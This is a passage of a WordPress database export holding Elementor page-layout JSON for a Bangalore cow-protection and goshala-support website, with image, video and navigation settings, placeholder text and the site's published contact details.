\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9945,1667,'_elementor_page_assets','a:0:{}'),(9948,1668,'_elementor_edit_mode','builder'),(9949,1668,'_elementor_template_type','wp-page'),(9950,1668,'_elementor_version','3.7.8'),(9951,1668,'_wp_page_template','elementor_canvas'),(9952,1668,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\